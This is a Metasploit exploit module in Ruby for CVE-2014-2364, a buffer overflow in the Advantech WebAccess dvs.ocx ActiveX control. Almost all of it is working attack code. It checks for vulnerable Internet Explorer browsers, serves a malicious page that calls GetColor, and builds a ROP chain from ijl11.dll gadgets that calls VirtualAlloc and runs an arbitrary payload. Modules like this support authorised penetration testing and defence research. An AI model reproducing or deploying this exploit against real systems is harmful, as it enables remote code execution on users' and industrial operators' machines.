Advantech WebAccess dvs.ocx GetColor Buffer Overflow

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::BrowserExploitServer  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',  
'Description' => %q{  
This module exploits a buffer overflow vulnerability in Advantec WebAccess. The  
vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to  
sprintf can be reached with user controlled data through the GetColor function.  
This module has been tested successfully on Windows XP SP3 with IE6 and Windows  
7 SP1 with IE8 and IE 9.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Unknown', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
['CVE', '2014-2364'],  
['ZDI', '14-255'],  
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']  
],  
'DefaultOptions' =>  
{  
'Retries' => false,  
'InitialAutoRunScript' => 'migrate -f'  
},  
'BrowserRequirements' =>  
{  
:source => /script|headers/i,  
:os_name => Msf::OperatingSystems::WINDOWS,  
:ua_name => /MSIE/i,  
:ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },  
:clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",  
:method => "GetColor"  
},  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'BadChars' => "\x00\x0a\x0d\x5c",  
# Patch the stack to execute the decoder...  
'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100  
# Fix the stack again, this time better :), before the payload  
# is executed.  
'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]  
"\x83\xC0\x08" + # add eax, byte 8  
"\x8b\x20" + # mov esp, [eax]  
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000  
},  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'Targets' =>  
[  
[ 'Automatic', { } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jul 17 2014'))  
end  
  
def on_request_exploit(cli, request, target_info)  
print_status("Requested: #{request.uri}")  
  
content = <<-EOS  
<html>  
<head>  
<meta http-equiv="cache-control" content="max-age=0" />  
<meta http-equiv="cache-control" content="no-cache" />  
<meta http-equiv="expires" content="0" />  
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />  
<meta http-equiv="pragma" content="no-cache" />  
</head>  
<body>  
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>  
<script language='javascript'>  
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);  
</script>  
</body>  
</html>  
EOS  
  
print_status("Sending #{self.name}")  
send_response_html(cli, content, {'Pragma' => 'no-cache'})  
end  
  
# Uses gadgets from ijl11.dll 1.1.2.16  
def rop_payload(code)  
xpl = rand_text_alphanumeric(61) # offset  
xpl << [0x60014185].pack("V") # RET  
xpl << rand_text_alphanumeric(8)  
  
# EBX = dwSize (0x40)  
xpl << [0x60012288].pack("V") # POP ECX # RETN  
xpl << [0xffffffff].pack("V") # ecx value  
xpl << [0x6002157e].pack("V") # POP EAX # RETN  
xpl << [0x9ffdafc9].pack("V") # eax value  
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN  
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10  
xpl << [0x60018084].pack("V") # POP EBP # RETN  
xpl << rand_text_alphanumeric(4) # padding  
xpl << rand_text_alphanumeric(4) # padding  
xpl << rand_text_alphanumeric(4) # padding  
xpl << rand_text_alphanumeric(4) # padding  
xpl << [0x60029f6c].pack("V") # .data ijl11.dll  
xpl << [0x60012288].pack("V") # POP ECX # RETN  
xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)  
xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret  
# EDX = flAllocationType (0x1000)  
xpl << [0x60012288].pack("V") # POP ECX # RETN  
xpl << [0xffffffff].pack("V") # ecx value  
xpl << [0x6002157e].pack("V") # POP EAX # RETN  
xpl << [0x9ffdbf89].pack("V") # eax value  
xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN  
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10  
# ECX = flProtect (0x40)  
xpl << [0x6002157e].pack("V") # POP EAX # RETN  
xpl << rand_text_alphanumeric(4) # padding  
xpl << rand_text_alphanumeric(4) # padding  
xpl << rand_text_alphanumeric(4) # padding  
xpl << rand_text_alphanumeric(4) # padding  
xpl << [0x60029f6c].pack("V") # .data ijl11.dll  
xpl << [0x60012288].pack("V") # POP ECX # RETN  
xpl << [0xffffffff].pack("V") # ecx value  
0x41.times do  
xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN  
end  
# EAX = ptr to &VirtualAlloc()  
xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]  
xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]  
# EBP = POP (skip 4 bytes)  
xpl << [0x6002054b].pack("V") # POP EBP # RETN  
xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)  
# ESI = ptr to JMP [EAX]  
xpl << [0x600181cc].pack("V") # POP ESI # RETN  
xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])  
# EDI = ROP NOP (RETN)  
xpl << [0x60021ad1].pack("V") # POP EDI # RETN  
xpl << [0x60021ad2].pack("V") # ptr to &(retn)  
# ESP = lpAddress (automatic)  
# PUSHAD # RETN  
xpl << [0x60018399].pack("V") # PUSHAD # RETN  
xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)  
xpl << code  
  
xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string  
xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping  
  
xpl  
end  
  
end  
`